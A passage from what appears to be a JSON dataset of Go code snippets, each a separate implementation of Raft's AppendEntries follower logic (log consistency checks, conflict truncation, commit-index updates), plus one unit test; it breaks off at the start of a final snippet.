[ "func (rf *Raft) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) error {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif rf.state == Down {\n\t\treturn nil\n\t}\n\n\tlog.Printf(\"[%v] received AppendEntries RPC call: Args%+v\", rf.me, args)\n\tif args.Term > rf.currentTerm {\n\t\tlog.Printf(\"[%v] currentTerm=%d out of date with AppendEntriesArgs.Term=%d\",\n\t\t\trf.me, rf.currentTerm, args.Term)\n\t\trf.toFollower(args.Term)\n\t\trf.leader = args.Leader\n\t}\n\n\treply.Success = false\n\tif args.Term == rf.currentTerm {\n\t\t// two leaders can't coexist. if Raft rfServer receives AppendEntries() RPC, another\n\t\t// leader already exists in this term\n\t\tif rf.state != Follower {\n\t\t\trf.toFollower(args.Term)\n\t\t\trf.leader = args.Leader\n\t\t}\n\t\trf.resetElection = time.Now()\n\n\t\t// does follower log match leader's (-1 is valid)\n\t\tif args.PrevLogIndex == -1 ||\n\t\t\t(args.PrevLogIndex < len(rf.log) && args.PrevLogTerm == rf.log[args.PrevLogIndex].Term) {\n\t\t\treply.Success = true\n\n\t\t\t// merge follower's log with leader's log starting from args.PrevLogTerm\n\t\t\t// skip entries where the term matches where term matches with args.Entries\n\t\t\t// and insert args.Entries from mismatch index\n\t\t\tinsertIdx, appendIdx := args.PrevLogIndex + 1, 0\n\t\t\tfor {\n\t\t\t\tif insertIdx >= len(rf.log) || appendIdx >= len(args.Entries) {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tif rf.log[insertIdx].Term != args.Entries[appendIdx].Term {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tinsertIdx++\n\t\t\t\tappendIdx++\n\t\t\t}\n\t\t\t// At the end of this loop:\n\t\t\t// - insertIdx points at the end of the log, or an index where the\n\t\t\t// term mismatches with an entry from the leader\n\t\t\t// - appendIdx points at the end of Entries, or an index where the\n\t\t\t// term mismatches with the corresponding log entry\n\t\t\tif appendIdx < len(args.Entries) {\n\t\t\t\tlog.Printf(\"[%v] append new entries %+v from %d\", rf.me,\n\t\t\t\t\targs.Entries[appendIdx:], insertIdx)\n\t\t\t\trf.log = append(rf.log[:insertIdx], args.Entries[appendIdx:]...)\n\t\t\t\tlog.Printf(\"[%v] new log: %+v\", rf.me, rf.log)\n\t\t\t}\n\n\t\t\t// update rf.commitIndex if the leader considers additional log entries as committed\n\t\t\tif args.LeaderCommit > rf.commitIndex {\n\t\t\t\tif args.LeaderCommit < len(rf.log)-1 {\n\t\t\t\t\trf.commitIndex = args.LeaderCommit\n\t\t\t\t} else {\n\t\t\t\t\trf.commitIndex = len(rf.log)-1\n\t\t\t\t}\n\n\t\t\t\tlog.Printf(\"[%v] updated commitIndex:%d\", rf.me, rf.commitIndex)\n\t\t\t\trf.readyCh <- struct{}{}\n\t\t\t}\n\t\t} else {\n\t\t\t// PrevLogIndex and PrevLogTerm didn't match\n\t\t\t// set ConflictIndex and ConflictTerm to allow leader to send the right entries quickly\n\t\t\tif args.PrevLogIndex >= len(rf.log) {\n\t\t\t\treply.ConflictIndex = len(rf.log)\n\t\t\t\treply.ConflictTerm = -1\n\t\t\t} else {\n\t\t\t\t// PrevLogTerm doesn't match\n\t\t\t\treply.ConflictTerm = rf.log[args.PrevLogIndex].Term\n\t\t\t\tvar idx int\n\t\t\t\tfor idx = args.PrevLogIndex - 1; idx >= 0; idx-- {\n\t\t\t\t\tif rf.log[idx].Term != reply.ConflictTerm {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\treply.ConflictIndex = idx + 1\n\t\t\t}\n\t\t}\n\t}\n\n\treply.Term = rf.currentTerm\n\trf.persist()\n\tlog.Printf(\"[%v] AppendEntriesReply sent: %+v\", rf.me, reply)\n\treturn nil\n}", "func (r *RaftNode) AppendEntries(ae AppendEntriesStruct, response *RPCResponse) error {\n\tr.Lock()\n\tdefer r.Unlock()\n\tif r.verbose {\n\t\tlog.Printf(\"AppendEntries(). ae: %s\", ae.String())\n\t\tlog.Printf(\"My log: %s\", r.Log.String())\n\t}\n\n\tresponse.Term = r.CurrentTerm\n\n\tif ae.LeaderID == r.currentLeader {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"AppendEntries from leader - reset tickers\")\n\t\t}\n\t\tr.resetTickers()\n\t}\n\n\t// Reply false if term < currentTerm\n\tif ae.Term < r.CurrentTerm {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"AE from stale term\")\n\t\t}\n\t\tresponse.Term = r.CurrentTerm\n\t\tresponse.Success = false\n\t\treturn nil\n\t}\n\n\t// NOTE - shifting to follower each time might sound misleading, but keeps things uniform\n\tr.shiftToFollower(ae.Term, ae.LeaderID)\n\n\t// Reply false if log doesn't contain an entry at prevLogIndex whose term matches prevLogTerm\n\tif int(ae.PrevLogIndex) >= len(r.Log) || // index out-of-bounds\n\t\tr.Log[ae.PrevLogIndex].Term != ae.PrevLogTerm {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"my PrevLogTerm does not match theirs\")\n\t\t}\n\t\tresponse.Term = r.CurrentTerm\n\t\tresponse.Success = false\n\t\treturn nil\n\t}\n\n\t// If an existing entry conflicts with a new one (same index, but different terms),\n\t// delete the existing entry and all that follow it\n\tif r.verbose {\n\t\tlog.Println(\"Applying entries...\")\n\t}\n\toffset := int(ae.PrevLogIndex) + 1\n\tfor i, entry := range ae.Entries {\n\t\tif i+offset >= len(r.Log) { // We certainly have no conflict\n\t\t\tif r.verbose {\n\t\t\t\tlog.Printf(\"Apply without conflict: index=%d\", i+offset)\n\t\t\t}\n\t\t\tr.append(entry)\n\t\t} else {\n\t\t\tif r.Log[i+offset].Term != ae.Entries[i].Term { // We have conflicting entry\n\t\t\t\tif r.verbose {\n\t\t\t\t\tlog.Printf(\"Conflict - delete suffix! (we have term=%d, they have term=%d). Delete our log from index=%d onwards.\", r.Log[i+offset].Term, ae.Entries[i].Term, i+offset)\n\t\t\t\t}\n\t\t\t\tr.Log = r.Log[:i+offset] // delete the existing entry and all that follow it\n\t\t\t\tr.append(entry) // append the current entry\n\t\t\t\tlog.Printf(\"\\n\\nLog: %s\\n\\n\", stringOneLog(r.Log))\n\t\t\t} else if r.Log[i+offset] != entry {\n\t\t\t\tlog.Printf(\"\\nOURS: %s\\n\\nTHEIRS: %s\", r.Log[i+offset].String(), entry.String())\n\t\t\t\tpanic(\"log safety violation occurred somewhere\")\n\t\t\t}\n\t\t}\n\t}\n\n\tresponse.Success = true\n\tlastIndex := r.getLastLogIndex()\n\n\t// Now we need to decide how to set our local commit index\n\tif ae.LeaderCommit > r.commitIndex {\n\t\tr.commitIndex = min(lastIndex, ae.LeaderCommit)\n\t}\n\tr.executeLog()\n\tr.persistState()\n\treturn nil\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\t// Resetting as we received a heart beat.\n\trf.resetElectionTimer()\n\trf.debug( \"AppendEntries: from LEADER %#v \\n\",args)\n\trf.debug(\"My current state: %#v \\n\", rf)\n\t//1. Reply false if term < currentTerm (§5.1)\n\tif args.Term > rf.currentTerm{\n\t\tif rf.currentState != Follower {\n\t\t\trf.transitionToFollower(args.Term)\n\t\t}\n\t}\n\t//2. Reply false if log doesn’t contain an entry at prevLogIndex\n\t//whose term matches prevLogTerm (§5.3)\n\t//3. If an existing entry conflicts with a new one (same index\n\t//but different terms), delete the existing entry and all that\n\t//follow it (§5.3)\n\t//4. Append any new entries not already in the log\n\t//5. If leaderCommit > commitIndex, set commitIndex =\n\t//\tmin(leaderCommit, index of last new entry)\n\t/////////////Pending implementation point 5 above.\n\tif args.Term < rf.currentTerm{\n\t\treply.Success = false\n\t\treply.Term =rf.currentTerm\n\t\treturn\n\t}\n\n\t// Update my term to that of the leaders\n\trf.currentTerm = args.Term\n\trf.debug(\"Dereferencing %d\",len(rf.log)-1)\n\trf.debug(\"Current log contents %v\", rf.log)\n\n\t// Check first whether it is a heartbeat or an actual append entry.\n\t// If it is heartbeat, then just reset the timer and then go back.\n\t//Otherwise, we need to add the entries into the logs of this peer.\n\t// If this is heart beat, then we know that the command is going to be nil.\n\t// Identify this and return.\n\tlastLogEntryIndex := len(rf.log) - 1\n\tif args.LogEntries == nil {\n\t\t//This is heart beat\n\t\treply.Term = rf.currentTerm\n\t\trf.debug(\"Received a HEART BEAT.\")\n\t}else {\n\t\trf.debug(\"Received an APPEND ENTRY. PROCESSING\")\n\t\tlastLogEntry := rf.log[len(rf.log)-1]\n\t\t//1a\n\t\tif lastLogEntryIndex < args.PreviousLogIndex {\n\t\t\treply.Success = false\n\t\t\treply.NextIndex = lastLogEntryIndex\n\t\t\trf.debug(\"1a \\n\")\n\t\t\treturn\n\t\t}\n\t\t//1b\n\t\tif lastLogEntryIndex > args.PreviousLogIndex {\n\t\t\treply.Success = false\n\t\t\trf.debug(\"Last log entry index --> %d, PreviousLogIndex From LEADER -->%d\", lastLogEntryIndex, args.PreviousLogIndex)\n\t\t\trf.log = rf.log[:len(rf.log)-1]\n\t\t\treturn\n\t\t}\n\t\t//3\n\t\tif lastLogEntry.LastLogTerm != args.PreviousLogTerm {\n\t\t\treply.Success = false\n\t\t\t//Reduce size by 1;\n\t\t\trf.debug(\"3 \\n\")\n\t\t\trf.log = rf.log[:len(rf.log)-1]\n\t\t\treturn\n\t\t}\n\n\t\t// 4 We are good to apply the command.\n\t\trf.printSlice(rf.log, \"Before\")\n\t\trf.debug(\"Printing the entry to be added within the handler %v\", args.LogEntries)\n\t\trf.log = append(rf.log, args.LogEntries...)\n\t\trf.printSlice(rf.log, \"After\")\n\t\trf.debug(\"\\n Applied the command to the log. Log size is -->%d \\n\", len(rf.log))\n\t\t//5\n\t}\n\tif args.LeaderCommit >rf.commitIndex {\n\t\trf.debug(\"5 Update commitIndex. LeaderCommit %v rf.commitIndex %v \\n\",args.LeaderCommit,rf.commitIndex )\n\t\t//Check whether all the entries are committed prior to this.\n\t\toldCommitIndex:=rf.commitIndex\n\t\trf.commitIndex = min(args.LeaderCommit,lastLogEntryIndex+1)\n\t\trf.debug(\"moving ci from %v to %v\", oldCommitIndex, rf.commitIndex)\n\t\t//Send all the received entries into the channel\n\t\tj:=0\n\t\tfor i:=oldCommitIndex ;i<args.LeaderCommit;i++ {\n\t\t\trf.debug(\"Committing %v \",i)\n\t\t\tapplyMsg := ApplyMsg{CommandValid: true, Command: rf.log[i].Command, CommandIndex: i}\n\t\t\tj++\n\t\t\trf.debug(\"Sent a response to the end client \")\n\t\t\trf.debug(\"applyMsg %v\",applyMsg)\n\t\t\trf.applyCh <- applyMsg\n\t\t}\n\t}\n\treply.Success = true\n\t//Check at the last. This is because this way the first HB will be sent immediately.\n\t//timer := time.NewTimer(100 * time.Millisecond)\n}", "func TestFollowerCommitEntry(t *testing.T) {\n\ttests := []struct {\n\t\tents []pb.Entry\n\t\tcommit uint64\n\t}{\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data2\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data\")},\n\t\t\t},\n\t\t\t2,\n\t\t},\n\t\t{\n\t\t\t[]pb.Entry{\n\t\t\t\t{Term: 1, Index: 1, Data: []byte(\"some data\")},\n\t\t\t\t{Term: 1, Index: 2, Data: []byte(\"some data2\")},\n\t\t\t},\n\t\t\t1,\n\t\t},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.becomeFollower(1, 2)\n\n\t\tr.Step(pb.Message{From: 2, To: 1, Type: pb.MsgApp, Term: 1, Entries: tt.ents, Commit: tt.commit})\n\n\t\tif g := r.raftLog.committed; g != tt.commit {\n\t\t\tt.Errorf(\"#%d: committed = %d, want %d\", i, g, tt.commit)\n\t\t}\n\t\twents := tt.ents[:int(tt.commit)]\n\t\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\t\tt.Errorf(\"#%d: nextEnts = %v, want %v\", i, g, wents)\n\t\t}\n\t}\n}", "func (rf *Raft) AppendEntries(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\tif len(args.Entries) > 0 {\n\t\tDPrintf(\"peer-%d gets an AppendEntries RPC(args.LeaderId = %d, args.PrevLogIndex = %d, args.LeaderCommit = %d, args.Term = %d, rf.currentTerm = %d).\", rf.me, args.LeaderId, args.PrevLogIndex, args.LeaderCommit, args.Term, rf.currentTerm)\n\t} else {\n\t\tDPrintf(\"peer-%d gets an heartbeat(args.LeaderId = %d, args.Term = %d, args.PrevLogIndex = %d, args.LeaderCommit = %d).\", rf.me, args.LeaderId, args.Term, args.PrevLogIndex, args.LeaderCommit)\n\t}\n\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\t// initialize the reply.\n\treply.ConflictIndex = 1\n\treply.ConflictTerm = 0\n\t// 1. detect obsolete information, this can filter out old leader's heartbeat.\n\tif args.Term < rf.currentTerm {\n\t\tDPrintf(\"peer-%d got an obsolete AppendEntries RPC..., ignore it.(args.Term = %d, rf.currentTerm = %d.)\", rf.me, args.Term, rf.currentTerm)\n\t\treply.Term = rf.currentTerm\n\t\treply.Success = false\n\t\treturn\n\t}\n\n\t/* Can the old Leader receive an AppendEntries RPC from the new leader?\n\t * I think the answer is yes.\n\t * The old leader's heartbeat packets lost all the time,\n\t * and others will be elected as the new leader(may do not need this peer's vote, consider a 3 peers cluster),\n\t * then the new leader will heartbeat the old leader. So the old leader will learn this situation and convert to a Follower.\n\t */\n\n\t// reset the election timeout as soon as possible to prevent an unneeded election!\n\trf.resetElectionTimeout()\n\trf.currentTerm = args.Term\n\trf.persist()\n\treply.Term = args.Term\n\n\tif rf.state == Candidate {\n\t\tDPrintf(\"peer-%d calm down from a Candidate to a Follower!!!\", rf.me)\n\t\trf.state = Follower\n\t} else if rf.state == Leader {\n\t\tDPrintf(\"peer-%d degenerate from a Leader to a Follower!!!\", rf.me)\n\t\trf.state = Follower\n\t\trf.nonleaderCh <- true\n\t}\n\n\t// consistent check\n\t// 2. Reply false(refuse the new entries) if log doesn't contain an entry at prevLogIndex whose term matches prevLogTerm($5.3)\n\tif len(rf.log) < args.PrevLogIndex {\n\t\t// Then the leader will learn this situation and adjust this follower's matchIndex/nextIndex in its state, and AppendEntries RPC again.\n\t\treply.Success = false\n\t\treturn\n\t}\n\n\tif args.PrevLogIndex > 0 && rf.log[args.PrevLogIndex-1].Term != args.PrevLogTerm {\n\t\t// 3. If an existing entry conflicts with a new one(same index but different terms), delete the existing entry and all that follow it.\n\t\t// delete the log entries from PrevLogIndex to end(including PrevLogIndex).\n\t\tDPrintf(\"peer-%d fail to pass the consistency check, truncate the log\", rf.me)\n\t\trf.log = rf.log[:args.PrevLogIndex-1] // log[i:j] contains i~j-1, and we don't want to reserve log entry at PrevLogIndex. So...\n\t\trf.persist()\n\t\treply.Success = false\n\t\treply.ConflictTerm = rf.log[args.PrevLogIndex-2].Term\n\t\t// fill the reply.FirstIndexOfThatTerm\n\t\ti := 1\n\t\tfor i = args.PrevLogIndex - 1; i >= 1; i-- {\n\t\t\tif rf.log[i-1].Term == reply.ConflictTerm {\n\t\t\t\tcontinue\n\t\t\t} else {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\treply.ConflictIndex = i + 1\n\t\treturn\n\t}\n\n\t// 4. Now this peer's log matches the leader's log at PrevLogIndex. Append any new entries not already in the log\n\tDPrintf(\"peer-%d AppendEntries RPC pass the consistent check at PrevLogIndex = %d!\", rf.me, args.PrevLogIndex)\n\t// now logs match at PrevLogIndex\n\t// NOTE: only if the logs don't match at PrevLogIndex, truncate the rf.log.\n\tpos := args.PrevLogIndex // pos is the index of the slice just after the element at PrevLogIndex.\n\ti := 0\n\tmismatch := false\n\tfor pos < len(rf.log) && i < len(args.Entries) {\n\t\tif rf.log[pos].Term == args.Entries[i].Term {\n\t\t\ti++\n\t\t\tpos++\n\t\t} else {\n\t\t\t// conflict!\n\t\t\tmismatch = true\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif mismatch {\n\t\t// need adjustment. rf.log[pos].Term != args.Entries[i].Term\n\t\t// truncate the rf.log and append entries.\n\t\trf.log = rf.log[:pos]\n\t\trf.log = append(rf.log, args.Entries[i:]...)\n\t\trf.persist()\n\t} else {\n\t\t// there some elements in entries but not in rf.log\n\t\tif pos == len(rf.log) && i < len(args.Entries) {\n\t\t\trf.log = rf.log[:pos]\n\t\t\trf.log = append(rf.log, args.Entries[i:]...)\n\t\t\trf.persist()\n\t\t}\n\t}\n\t// now the log is consistent with the leader's. from 0 ~ PrevLogIndex + len(Entries). but whether the subsequents are consistent is unknown.\n\treply.Success = true\n\t// update the rf.commitIndex. If leaderCommit > commitIndex, set commitIndex = min(leaderCommit, index of last new entry)\n\tif rf.commitIndex < args.LeaderCommit {\n\t\t// we need to update commitIndex locally. Explictly update the old entries. See my note upon Figure8.\n\t\t// This step will exclude some candidates to be elected as the new leader!\n\t\t// commit!\n\t\told_commit_index := rf.commitIndex\n\n\t\tif args.LeaderCommit <= len(rf.log) {\n\t\t\trf.commitIndex = args.LeaderCommit\n\t\t} else {\n\t\t\trf.commitIndex = len(rf.log)\n\t\t}\n\t\tDPrintf(\"peer-%d Nonleader update its commitIndex from %d to %d. And it's len(rf.log) = %d.\", rf.me, old_commit_index, rf.commitIndex, len(rf.log))\n\n\t\t// apply. Now all the commands before rf.commitIndex will not be changed, and could be applied.\n\t\tgo func() {\n\t\t\trf.canApplyCh <- true\n\t\t}()\n\t}\n\treturn\n}", "func (r *Raft) AppendToLog_Follower(request AppendEntriesReq) {\n\tterm := request.term\n\tcmd := request.entries\n\tindex := request.prevLogIndex + 1\n\tlogVal := LogVal{term, cmd, 0} //make object for log's value field\n\n\tif len(r.myLog) == index {\n\t\tr.myLog = append(r.myLog, logVal) //when trying to add a new entry\n\t} else {\n\t\tr.myLog[index] = logVal //overwriting in case of log repair\n\t\t//fmt.Println(\"Overwiriting!!\")\n\t}\n\t//fmt.Println(r.myId(), \"Append to log\", string(cmd))\n\t//modify metadata after appending\n\t//r.myMetaData.lastLogIndex = r.myMetaData.lastLogIndex + 1\n\t//r.myMetaData.prevLogIndex = r.myMetaData.lastLogIndex\n\t//\tif len(r.myLog) == 1 {\n\t//\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1\n\t//\t} else if len(r.myLog) > 1 {\n\t//\t\tr.myMetaData.prevLogTerm = r.myLog[r.myMetaData.prevLogIndex].Term\n\t//\t}\n\n\t//Changed on 4th april, above is wrong in case of overwriting of log\n\tr.myMetaData.lastLogIndex = index\n\tr.myMetaData.prevLogIndex = index - 1\n\tif index == 0 {\n\t\tr.myMetaData.prevLogTerm = r.myMetaData.prevLogTerm + 1 //or simple -1\n\t} else if index >= 1 {\n\t\tr.myMetaData.prevLogTerm = r.myLog[index-1].Term\n\t}\n\n\t//Update commit index\n\tleaderCI := float64(request.leaderCommitIndex)\n\tmyLI := float64(r.myMetaData.lastLogIndex)\n\tif request.leaderCommitIndex > r.myMetaData.commitIndex {\n\t\tif myLI == -1 { //REDUNDANT since Append to log will make sure it is never -1,also must not copy higher CI if self LI is -1\n\t\t\tr.myMetaData.commitIndex = int(leaderCI)\n\t\t} else {\n\t\t\tr.myMetaData.commitIndex = int(math.Min(leaderCI, myLI))\n\t\t}\n\t}\n\t//fmt.Println(r.myId(), \"My CI is:\", r.myMetaData.commitIndex)\n\tr.WriteLogToDisk()\n}", "func (handler *RuleHandler) FollowerOnAppendEntries(msg iface.MsgAppendEntries, log iface.RaftLog, status iface.Status) []interface{} {\n\tactions := make([]interface{}, 0) // list of actions created\n\t// since we are hearing from the leader, reset timeout\n\tactions = append(actions, iface.ActionResetTimer{\n\t\tHalfTime: false,\n\t})\n\tactions = append(actions, iface.ActionSetLeaderLastHeard{\n\t\tInstant: time.Now(),\n\t})\n\n\t// maybe we are outdated\n\tif msg.Term > status.CurrentTerm() {\n\t\tactions = append(actions, iface.ActionSetCurrentTerm{\n\t\t\tNewCurrentTerm: msg.Term,\n\t\t})\n\t}\n\n\tprevEntry, _ := log.Get(msg.PrevLogIndex)\n\n\t// leader is outdated ?\n\tif msg.Term < status.CurrentTerm() {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// I dont have previous log entry (but should)\n\tif prevEntry == nil && msg.PrevLogIndex != -1 {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// I have previous log entry, but it does not match\n\tif prevEntry != nil && prevEntry.Term != msg.PrevLogTerm {\n\t\tactions = append(actions, iface.ReplyAppendEntries{\n\t\t\tAddress: status.NodeAddress(),\n\t\t\tSuccess: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// all is ok. accept new entries\n\tactions = append(actions, iface.ReplyAppendEntries{\n\t\tAddress: status.NodeAddress(),\n\t\tSuccess: true,\n\t\tTerm: status.CurrentTerm(),\n\t})\n\n\t// if there is anything to append, do it\n\tif len(msg.Entries) > 0 {\n\t\t// delete all entries in log after PrevLogIndex\n\t\tactions = append(actions, iface.ActionDeleteLog{\n\t\t\tCount: log.LastIndex() - msg.PrevLogIndex,\n\t\t})\n\n\t\t// take care ! Maybe we are removing an entry\n\t\t// containing our current cluster configuration.\n\t\t// In this case, revert to previous cluster\n\t\t// configuration\n\t\tcontainsClusterChange := false\n\t\tstabilized := false\n\t\tclusterChangeIndex := status.ClusterChangeIndex()\n\t\tclusterChangeTerm := status.ClusterChangeTerm()\n\t\tcluster := append(status.PeerAddresses(), status.NodeAddress())\n\t\tfor !stabilized {\n\t\t\tstabilized = true\n\t\t\tif clusterChangeIndex > msg.PrevLogIndex {\n\t\t\t\tstabilized = false\n\t\t\t\tcontainsClusterChange = true\n\t\t\t\tentry, _ := log.Get(clusterChangeIndex)\n\t\t\t\trecord := &iface.ClusterChangeCommand{}\n\t\t\t\tjson.Unmarshal(entry.Command, &record)\n\t\t\t\tclusterChangeIndex = record.OldClusterChangeIndex\n\t\t\t\tclusterChangeTerm = record.OldClusterChangeTerm\n\t\t\t\tcluster = record.OldCluster\n\t\t\t}\n\t\t}\n\n\t\t// if deletion detected, rewind to previous configuration\n\t\tif containsClusterChange {\n\t\t\tactions = append(actions, iface.ActionSetClusterChange{\n\t\t\t\tNewClusterChangeIndex: clusterChangeIndex,\n\t\t\t\tNewClusterChangeTerm: clusterChangeTerm,\n\t\t\t})\n\t\t\tpeers := []iface.PeerAddress{}\n\t\t\tfor _, addr := range cluster {\n\t\t\t\tif addr != status.NodeAddress() {\n\t\t\t\t\tpeers = append(peers, addr)\n\t\t\t\t}\n\t\t\t}\n\t\t\tactions = append(actions, iface.ActionSetPeers{\n\t\t\t\tPeerAddresses: peers,\n\t\t\t})\n\t\t}\n\n\t\t// append all entries sent by leader\n\t\tactions = append(actions, iface.ActionAppendLog{\n\t\t\tEntries: msg.Entries,\n\t\t})\n\n\t\t// once again, take care ! Maybe we are adding some entry\n\t\t// describing a cluster change. In such a case, we must apply\n\t\t// the new cluster configuration to ourselves (specifically,\n\t\t// the last cluster configuration among the new entries)\n\t\tfor index := len(msg.Entries) - 1; index >= 0; index-- {\n\t\t\tif msg.Entries[index].Kind != iface.EntryAddServer &&\n\t\t\t\tmsg.Entries[index].Kind != iface.EntryRemoveServer {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\trecord := &iface.ClusterChangeCommand{}\n\t\t\tjson.Unmarshal(msg.Entries[index].Command, &record)\n\t\t\tactions = append(actions, iface.ActionSetClusterChange{\n\t\t\t\tNewClusterChangeIndex: msg.PrevLogIndex + int64(index+1),\n\t\t\t\tNewClusterChangeTerm: msg.Entries[index].Term,\n\t\t\t})\n\t\t\tpeers := []iface.PeerAddress{}\n\t\t\tfor _, addr := range record.NewCluster {\n\t\t\t\tif addr != status.NodeAddress() {\n\t\t\t\t\tpeers = append(peers, addr)\n\t\t\t\t}\n\t\t\t}\n\t\t\tactions = append(actions, iface.ActionSetPeers{\n\t\t\t\tPeerAddresses: peers,\n\t\t\t})\n\t\t\tbreak\n\t\t}\n\n\t}\n\n\t// if leader has committed more than we know, update our index\n\t// and demand state-machine application\n\tif msg.LeaderCommitIndex > status.CommitIndex() {\n\t\tactions = append(actions, iface.ActionSetCommitIndex{\n\t\t\tNewCommitIndex: int64(math.Min(\n\t\t\t\tfloat64(msg.LeaderCommitIndex),\n\t\t\t\tfloat64(msg.PrevLogIndex+int64(len(msg.Entries))),\n\t\t\t)),\n\t\t})\n\t\t// order the state machine to apply the new committed entries\n\t\t// (only if they are state machine commands)\n\t\t// TODO: Treat configuration change\n\t\tfor index := status.CommitIndex() + 1; index < msg.LeaderCommitIndex; index++ {\n\t\t\tvar entry *iface.LogEntry\n\n\t\t\t// get from my log\n\t\t\tif index <= msg.PrevLogIndex {\n\t\t\t\tentry, _ = log.Get(index)\n\n\t\t\t\t// get from leader\n\t\t\t} else {\n\t\t\t\tentry = &msg.Entries[index-msg.PrevLogIndex-1]\n\t\t\t}\n\n\t\t\tswitch entry.Kind {\n\t\t\tcase iface.EntryStateMachineCommand:\n\t\t\t\tactions = append(actions, iface.ActionStateMachineApply{\n\t\t\t\t\tEntryIndex: index,\n\t\t\t\t})\n\t\t\t}\n\t\t}\n\t}\n\n\treturn actions\n}", "func (r *Raft) AppendToLog_Follower(request AppendEntriesReq) {\n\tTerm := request.LeaderLastLogTerm\n\tcmd := request.Entries\n\tindex := request.PrevLogIndex + 1\n\tlogVal := LogVal{Term, cmd, 0} //make object for log's value field\n\n\tif len(r.MyLog) == index {\n\t\tr.MyLog = append(r.MyLog, logVal) //when trying to add a new entry\n\t} else {\n\t\tr.MyLog[index] = logVal //overwriting in case of log repair\n\t}\n\n\tr.MyMetaData.LastLogIndex = index\n\tr.MyMetaData.PrevLogIndex = index - 1\n\tif index == 0 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyMetaData.PrevLogTerm + 1 //or simple -1\n\t} else if index >= 1 {\n\t\tr.MyMetaData.PrevLogTerm = r.MyLog[index-1].Term\n\t}\n\tleaderCI := float64(request.LeaderCommitIndex) //Update commit index\n\tmyLI := float64(r.MyMetaData.LastLogIndex)\n\tif request.LeaderCommitIndex > r.MyMetaData.CommitIndex {\n\t\tr.MyMetaData.CommitIndex = int(math.Min(leaderCI, myLI))\n\t}\n\tr.WriteLogToDisk()\n}", "func (rf *Raft) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) {\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\treply.Term = rf.currentTerm\n\tif args.Term < rf.currentTerm {\n\t\t// fmt.Printf(\"APPEND_FAIL0 : %v append with %v, return %v\\n\", rf.me, args.Term, reply.Term)\n\t\treturn\n\t}\n\n\trf.heartbeatChan <- true\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.toFollower()\n\t\trf.persist()\n\t}\n\n\t// fmt.Printf(\"APPEND_TRY : %v append with %v/ %v, %v/ %v\\n\", rf.me, len(rf.log), args.PrevLogIndex, rf.log[args.PrevLogIndex].Term, args.PrevLogTerm)\n\n\tif len(rf.log) <= args.PrevLogIndex {\n\t\treply.Success = false\n\t\treply.LogIndex = len(rf.log)\n\t\t// fmt.Printf(\"APPEND_FAIL1 : %v append with %v, return %v\\n\", rf.me, args.PrevLogIndex, reply.LogIndex)\n\t\treturn\n\t}\n\n\tif rf.log[args.PrevLogIndex].Term != args.PrevLogTerm {\n\t\treply.Success = false\n\t\t// find first one that have same term with entries\n\t\tfor i := args.PrevLogIndex - 1; i > 0; i-- {\n\t\t\tif rf.log[i].Term == args.PrevLogTerm {\n\t\t\t\treply.LogIndex = i\n\t\t\t} else {\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t\tif reply.LogIndex < 1 {\n\t\t\treply.LogIndex = 1\n\t\t}\n\t\t// fmt.Printf(\"APPEND_FAIL2 : %v append with %v, %v, return %v\\n\", rf.me, rf.log[args.PrevLogIndex].Term, args.PrevLogTerm, reply.LogIndex)\n\t\treturn\n\t}\n\n\tif len(args.Entries) > 0 {\n\t\t// fmt.Printf(\"APPEND : %v append with %v, %v\\n\", rf.me, args.Entries[0].Term, args.Entries)\n\t}\n\n\trf.log = rf.log[:args.PrevLogIndex+1]\n\tfor _, log := range args.Entries {\n\t\trf.log = append(rf.log, log)\n\t}\n\trf.persist()\n\n\tif args.LeaderCommit > rf.commitIndex {\n\t\trf.commit(args.LeaderCommit)\n\t}\n\treply.LogIndex = len(rf.log)\n}", "func (node *Node) AppendEntries(args AppendEntriesArgs, reply *AppendEntriesReply) error {\n\tnode.mu.Lock()\n\tdefer node.mu.Unlock()\n\n\tif node.state == dead {\n\t\treturn 